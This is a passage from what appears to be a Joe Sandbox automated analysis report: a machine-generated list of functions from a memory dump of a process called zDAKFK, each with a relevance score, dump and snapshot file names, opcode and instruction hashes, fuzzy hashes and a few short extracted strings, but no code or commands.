                                                                                                                                                                      • Opcode ID: f4e0ee963aecf1953792d6e652c75c3cb1a857bbf28ac5883cd260dc83fddaae
                                                                                                                                                                      • Instruction ID: 88b7e1d7d67c2bc819c80361c201d64e909f2169020ba0432cd3db42e8b7e1b8
                                                                                                                                                                      • Opcode Fuzzy Hash: f4e0ee963aecf1953792d6e652c75c3cb1a857bbf28ac5883cd260dc83fddaae
                                                                                                                                                                      • Instruction Fuzzy Hash: A791BCB1A05208EFDF14EFA9E9446AEBBF6EF89310F10846EE445A7351DB30AC05CB51
                                                                                                                                                                      Function 04A91D90 Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: PH^q
                                                                                                                                                                      • API String ID: 0-2549759414
                                                                                                                                                                      • Opcode ID: 241a515844a45cf636f87830e3175f81a14867c7f7e8dfe4612422df1751c619
                                                                                                                                                                      • Instruction ID: 405db1ff2a6740f0231a6f90162acf859688bd64650f101858db502a6efebe4b
                                                                                                                                                                      • Opcode Fuzzy Hash: 241a515844a45cf636f87830e3175f81a14867c7f7e8dfe4612422df1751c619
                                                                                                                                                                      • Instruction Fuzzy Hash: 22514630B0420A8FEF059B79D858BAD7BF2BF89355F5444A9D406E72A0DF34AC80CB60
                                                                                                                                                                      Function 04A97A6A Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: goX
                                                                                                                                                                      • API String ID: 0-890022425
                                                                                                                                                                      • Opcode ID: 827d27eed11667b103ec20e9373b753a572dbe91fec5496f2c00bee4d7c9c1e2
                                                                                                                                                                      • Instruction ID: 069d056574265ba3d51e2f587fd0325956fcd2efe889fe91fdbd389d6dfe9593
                                                                                                                                                                      • Opcode Fuzzy Hash: 827d27eed11667b103ec20e9373b753a572dbe91fec5496f2c00bee4d7c9c1e2
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D5132B1D053089FDB20DFA9C8846DEBFF1EF5A304F64805AD408AB211E775AA46CF90
                                                                                                                                                                      Function 04A98324 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: goX
                                                                                                                                                                      • API String ID: 0-890022425
                                                                                                                                                                      • Opcode ID: 52f7b7be4b3abadfd00b3c57a83777f108e45aaecf7641fe4b33df075ba0fb89
                                                                                                                                                                      • Instruction ID: 2e89f2bde0bb0ba2eb4def12f20816bbcc0fdb5463ee9134b40a2c32977436f4
                                                                                                                                                                      • Opcode Fuzzy Hash: 52f7b7be4b3abadfd00b3c57a83777f108e45aaecf7641fe4b33df075ba0fb89
                                                                                                                                                                      • Instruction Fuzzy Hash: 7341D2B1D012099FDB10DFA9C5846CEBBF5FF49304F648129D409BB214D7756A86CF90
                                                                                                                                                                      Function 04A97A84 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: goX
                                                                                                                                                                      • API String ID: 0-890022425
                                                                                                                                                                      • Opcode ID: 40b7812b5363eb5d8f5d3fa90b842b860ea6b892cef55c75e5767f6dbd7a5765
                                                                                                                                                                      • Instruction ID: f501aa2f3107c37d70370c7e72699ce6457e10ebec3094952593ca0ef2cc9c72
                                                                                                                                                                      • Opcode Fuzzy Hash: 40b7812b5363eb5d8f5d3fa90b842b860ea6b892cef55c75e5767f6dbd7a5765
                                                                                                                                                                      • Instruction Fuzzy Hash: 9241E0B0D002089FDF20DFA9C584ADEBBF5BF49304F64812AD409BB210D775AA46CF91
                                                                                                                                                                      Function 04A91388 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q
                                                                                                                                                                      • API String ID: 0-1614139903
                                                                                                                                                                      • Opcode ID: 0674e0d159ba55b25df720be8ed8a708e2ae3db02c9c9b6147c33a00e4065a0d
                                                                                                                                                                      • Instruction ID: 84ab5a3fcfee4b7dd9818c0fe5dc102a1dc20f836c379ec7f8bc47192ff57eab
                                                                                                                                                                      • Opcode Fuzzy Hash: 0674e0d159ba55b25df720be8ed8a708e2ae3db02c9c9b6147c33a00e4065a0d
                                                                                                                                                                      • Instruction Fuzzy Hash: B531B871E042855FDB06EBBDD8516EE7FF1EF82300B0044A9C041AF266EB60AD49CB52
                                                                                                                                                                      Function 04A913A8 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q
                                                                                                                                                                      • API String ID: 0-1614139903
                                                                                                                                                                      • Opcode ID: ef4fcd94065cb821d5eda1c607f41c673db9e85e5af6c20b6c6c73e19735e92d
                                                                                                                                                                      • Instruction ID: fe9efe59f3b29c3d67a03710754d90e42d46ca3e26893a1e45ffe0cf5a77f50f
                                                                                                                                                                      • Opcode Fuzzy Hash: ef4fcd94065cb821d5eda1c607f41c673db9e85e5af6c20b6c6c73e19735e92d
                                                                                                                                                                      • Instruction Fuzzy Hash: AD116331E402099FDB05EBB9D9515EEBBF6EF85300F404479D1016F269DF31AE498B92
                                                                                                                                                                      Function 04A94710 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: X t
                                                                                                                                                                      • API String ID: 0-1593980829
                                                                                                                                                                      • Opcode ID: 9d5099e6cd8271fda2247ae38b472abd401f5b68181f7b3ce033bd0c650e115f
                                                                                                                                                                      • Instruction ID: 78a6912523a8ef8e50b0d2c5773dd4973aea8ec50c0c9e38fb07528496d83abf
                                                                                                                                                                      • Opcode Fuzzy Hash: 9d5099e6cd8271fda2247ae38b472abd401f5b68181f7b3ce033bd0c650e115f
                                                                                                                                                                      • Instruction Fuzzy Hash: 4C119130A042099BEF14EFA9D41579EB7F2EF89308F108469D505AB284CB75AD06CBE1
                                                                                                                                                                      Function 04A94FF0 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: X t
                                                                                                                                                                      • API String ID: 0-1593980829
                                                                                                                                                                      • Opcode ID: 278847f68886fccef00abdf5b04b41e0bd5e96ae02bfff1adbd7f3a6933d544a
                                                                                                                                                                      • Instruction ID: cc8378add0cb03f7e0b79e335d1feb890227f9f167482f21542b7e6f37ce41c3
                                                                                                                                                                      • Opcode Fuzzy Hash: 278847f68886fccef00abdf5b04b41e0bd5e96ae02bfff1adbd7f3a6933d544a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0001AD70A00105AFEB00AF68C918A9BBBF2FF89314F10816AE402FB745CA759C008BA5
                                                                                                                                                                      Function 04A94700 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: X t
                                                                                                                                                                      • API String ID: 0-1593980829
                                                                                                                                                                      • Opcode ID: 822c67025f61f64a6550dc7341a01992a47f3a350698adc2d66cb7162f001564
                                                                                                                                                                      • Instruction ID: 8fe90c510e90fc11f9e82f84e6a81b4cbaffd1f684e9d90c4ed7e684306ce96f
                                                                                                                                                                      • Opcode Fuzzy Hash: 822c67025f61f64a6550dc7341a01992a47f3a350698adc2d66cb7162f001564
                                                                                                                                                                      • Instruction Fuzzy Hash: D5010830A042058FEF14EB69C4187AE7BF2EF89304F108868D002AB6C4CB74AD03CBE1
                                                                                                                                                                      Function 04A923F1 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q
                                                                                                                                                                      • API String ID: 0-1614139903
                                                                                                                                                                      • Opcode ID: 8554cb07b4b0b63a76e630abcae3691f698498bd6c06dd518faae4a20495b3a9
                                                                                                                                                                      • Instruction ID: 8d8d8f5433c08e9c25dcdc97c39583ae378417aeaf34919d1acd970f9a53052c
                                                                                                                                                                      • Opcode Fuzzy Hash: 8554cb07b4b0b63a76e630abcae3691f698498bd6c06dd518faae4a20495b3a9
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F1161309092889FC706EF78E56859CBFF0FF86200B1545E9D445DB266DE345E49CB52
                                                                                                                                                                      Function 04A95000 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: X t
                                                                                                                                                                      • API String ID: 0-1593980829
                                                                                                                                                                      • Opcode ID: 18c9282da048894155af69f13747c0c2bf24680d766c13fe97f6d3f0064dadcf
                                                                                                                                                                      • Instruction ID: 6f482845d733576a1a953e53f4ad170c76200d4568620952171bdd46b58264d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 18c9282da048894155af69f13747c0c2bf24680d766c13fe97f6d3f0064dadcf
                                                                                                                                                                      • Instruction Fuzzy Hash: 4C019E31A00105AFEB00AF68C809AABBBF6EB89314F044169E402BB345CA759D00CBA5
                                                                                                                                                                      Function 04A92420 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: 4'^q
                                                                                                                                                                      • API String ID: 0-1614139903
                                                                                                                                                                      • Opcode ID: c810935880f4de47c2e9f1ae63173c7aeec8c90db0f2a46e23d9521b192820b4
                                                                                                                                                                      • Instruction ID: a8711db79fbcacdd3ce07519e1674c3753fe6276d018cca523f6f697bfb5d6f6
                                                                                                                                                                      • Opcode Fuzzy Hash: c810935880f4de47c2e9f1ae63173c7aeec8c90db0f2a46e23d9521b192820b4
                                                                                                                                                                      • Instruction Fuzzy Hash: FFF01434A05209EFCB45EFB8E99859CBFF1FB85201B1046A9D405EB365EF346E488B51
                                                                                                                                                                      Function 04A91F88 Relevance: .3, Instructions: 324COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: fc1106015d8e0a869ebfca87d84f919a88ce319dc008103f0695b0ed09c5553a
                                                                                                                                                                      • Instruction ID: b49f5baec0d120d2c9df29399a90681a046db531f0e46025aa43d8f3d2531c2d
                                                                                                                                                                      • Opcode Fuzzy Hash: fc1106015d8e0a869ebfca87d84f919a88ce319dc008103f0695b0ed09c5553a
                                                                                                                                                                      • Instruction Fuzzy Hash: E9C19F31A002059FCB04DFA9D54079EBBF2FF88300F2589A9E419BB355DB75AD468B91
                                                                                                                                                                      Function 04A90040 Relevance: .3, Instructions: 298COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ec29f4908a5ca3cd569c2a1b4aa6c9261a13345d2c57f61875009ac785a6d3c9
                                                                                                                                                                      • Instruction ID: 6372d91798f4bc09580e85c4150859dedec4bf8a091cb1f915ac73993b469aa1
                                                                                                                                                                      • Opcode Fuzzy Hash: ec29f4908a5ca3cd569c2a1b4aa6c9261a13345d2c57f61875009ac785a6d3c9
                                                                                                                                                                      • Instruction Fuzzy Hash: 71C16A34A042018FDB04AF69D89479AB7E2FFC8304F45897DD90AAF396DF75A844CB51
                                                                                                                                                                      Function 04A90006 Relevance: .3, Instructions: 277COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 539e5a2ea5f08f9ab19c71c5295e8abdcf26057a0c3999a28f600704d88ef911
                                                                                                                                                                      • Instruction ID: a4a4d16894c8305c0f397e1fbdb53c4340479afa000b8b61dcaee23e4f6f06f8
                                                                                                                                                                      • Opcode Fuzzy Hash: 539e5a2ea5f08f9ab19c71c5295e8abdcf26057a0c3999a28f600704d88ef911
                                                                                                                                                                      • Instruction Fuzzy Hash: 5CB18E31A042018FDB05EF28C89479AB7A2FF89304F1585BDD90AAF396DB75AC45CB91
                                                                                                                                                                      Function 04A9F570 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 5171ed4f0496a4d9d4311341bcca85b7f48491db7c064e7b9dd184ace2ca7719
                                                                                                                                                                      • Instruction ID: 8acbaec794dff5db8dc9cdde9b1d73a03a5677945afb247a6541c77340db4d89
                                                                                                                                                                      • Opcode Fuzzy Hash: 5171ed4f0496a4d9d4311341bcca85b7f48491db7c064e7b9dd184ace2ca7719
                                                                                                                                                                      • Instruction Fuzzy Hash: 35719E74A01248AFDB15DF69D894DAEBBF2FF89314B1540A9F901AB361DB31EC81CB50
                                                                                                                                                                      Function 04A915D0 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 270513cb321024b44705916d219d445d090e438b50d7efd0c77deb06ae4a38f6
                                                                                                                                                                      • Instruction ID: 4f6d61043a781b1373196bdc18d55043524a21ecb32692903913ec5102b8af5d
                                                                                                                                                                      • Opcode Fuzzy Hash: 270513cb321024b44705916d219d445d090e438b50d7efd0c77deb06ae4a38f6
                                                                                                                                                                      • Instruction Fuzzy Hash: 9E51B030A04245CFDB05EB68C591A9DBBF2EF89308F1584A9E446AF366DB31FD06CB50
                                                                                                                                                                      Function 04A972A8 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4d4d8fef45f73aa5acd546043a1a665cc84a71d53ecf0971cc2593b5ae023f7f
                                                                                                                                                                      • Instruction ID: bd0fda5fa4ddfba52cf68bd7f3ad702325e1cbff96aee2515f5e5e907ddff6cc
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d4d8fef45f73aa5acd546043a1a665cc84a71d53ecf0971cc2593b5ae023f7f
                                                                                                                                                                      • Instruction Fuzzy Hash: 45518074E102499FDF10EFA9C904AAFBBF9EF89304F10842AD455E7250DB34AD05CBA0
                                                                                                                                                                      Function 04A9E400 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f573d03726c42de9a6e565c84f7a305538d9c2552421654d83bdf2c29c1979dc
                                                                                                                                                                      • Instruction ID: 1a009a3affc1d98901622df431018f7431ed8e2e7ba930fd2d07725498f60f05
                                                                                                                                                                      • Opcode Fuzzy Hash: f573d03726c42de9a6e565c84f7a305538d9c2552421654d83bdf2c29c1979dc
                                                                                                                                                                      • Instruction Fuzzy Hash: 45519D30A042458FDB15EBA8C5947BEBBF2EFC9304F148529D006AB395EF74AD46DB42
                                                                                                                                                                      Function 04A92D00 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d291af9ba6b0cdb65b9f09f8efd7acc4a2548afe909da5da0c3534a9d1a1f923
                                                                                                                                                                      • Instruction ID: b1deda77551105cb754f2fad56a554888684eb1b957b13208de1390a89c491b2
                                                                                                                                                                      • Opcode Fuzzy Hash: d291af9ba6b0cdb65b9f09f8efd7acc4a2548afe909da5da0c3534a9d1a1f923
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A412535B14259AFDB14DB69C884FADBBF6AF89704F1444A9E501EB3A1DA71EC00CB50
                                                                                                                                                                      Function 04A94150 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e83184474ed3152559060ed1bf7b0ac4bd06bfaedf06c8efa09605ba52a8d7d5
                                                                                                                                                                      • Instruction ID: 242b6fe54569271af4701ff864f70c21d1255bed84d89b64bb8d1af0a2e4fe0e
                                                                                                                                                                      • Opcode Fuzzy Hash: e83184474ed3152559060ed1bf7b0ac4bd06bfaedf06c8efa09605ba52a8d7d5
                                                                                                                                                                      • Instruction Fuzzy Hash: 42415535A042298BDF19EFA9D944AADBBF5BF8C314F144129D800AB355DB34AD42CBA0
                                                                                                                                                                      Function 04A91BAC Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 25825527f4f0448a529c8a5cd73dfa757d3afa33c49209d524070c2d75e32a8d
                                                                                                                                                                      • Instruction ID: 80e00b535d9cb10c89ad5f3f02e7ba53795afb49daf8d3d322eeade34f51a4c8
                                                                                                                                                                      • Opcode Fuzzy Hash: 25825527f4f0448a529c8a5cd73dfa757d3afa33c49209d524070c2d75e32a8d
                                                                                                                                                                      • Instruction Fuzzy Hash: BD41D031A043158FDB19AB3884546BEB7F6EFC5305F14886ED41A9B265CF34AC86CB92
                                                                                                                                                                      Function 04A9E718 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3cf20386173aab90142dca4fc256faa082e7def38c473dd72621ff8c48625704
                                                                                                                                                                      • Instruction ID: e26eb30936c82173df289a47bca94690eac2a01f570d71f2b695c4af6198072a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3cf20386173aab90142dca4fc256faa082e7def38c473dd72621ff8c48625704
                                                                                                                                                                      • Instruction Fuzzy Hash: D8511975A01209AFDF10DF94D594BAEBBF2FF88314F118069E905A73A2CB31AD11CB51
                                                                                                                                                                      Function 04A9B9E0 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2f10a5fcaa661690473239baa96b11706f36c2fc7dfc559c9e78a1cad8490649
                                                                                                                                                                      • Instruction ID: fe636bc9216654caea2db904d9ddcc280fee15ac04e3699b3d355fa2b29216b8
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f10a5fcaa661690473239baa96b11706f36c2fc7dfc559c9e78a1cad8490649
                                                                                                                                                                      • Instruction Fuzzy Hash: EB41D335A002188FDF14EBA8D885FDDB7F1BF88704F514068E505AB3A5DB79AC01CBA0
                                                                                                                                                                      Function 04A915E0 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000C.00000002.1771150804.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_12_2_4a90000_zDAKFK.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c0a3fb4ebd4fbaff68227f1750e3fb652d3e907e08691be7514c96d7bf9f02b8
                                                                                                                                                                      • Instruction ID: 38982f713f82740f855e219a9706c362afa1acad92bbefc8aa745cbaa88a5c06
                                                                                                                                                                      • Opcode Fuzzy Hash: c0a3fb4ebd4fbaff68227f1750e3fb652d3e907e08691be7514c96d7bf9f02b8
                                                                                                                                                                      • Instruction Fuzzy Hash: B0414B30A00205CFDB15EB68D595A9EB7F2EF89308F10846CE40AAB365DB72AD45CB91
                                                                                                                                                                      Function 04A91590 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
